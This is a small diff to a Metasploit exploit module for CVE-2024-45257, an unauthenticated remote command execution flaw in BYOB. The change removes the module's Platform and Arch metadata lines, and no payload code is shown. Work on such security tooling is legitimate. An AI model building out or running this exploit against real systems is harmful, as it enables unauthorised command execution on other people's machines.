@@ -34,8 +34,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2024-45257'],
           ['URL', 'https://blog.chebuya.com/posts/unauthenticated-remote-command-execution-on-byob/']
         ],
-        'Platform' => %w[unix linux],
-        'Arch' => [ARCH_CMD],
         'Targets' => [
           [
             'Unix/Linux Command Shell', {
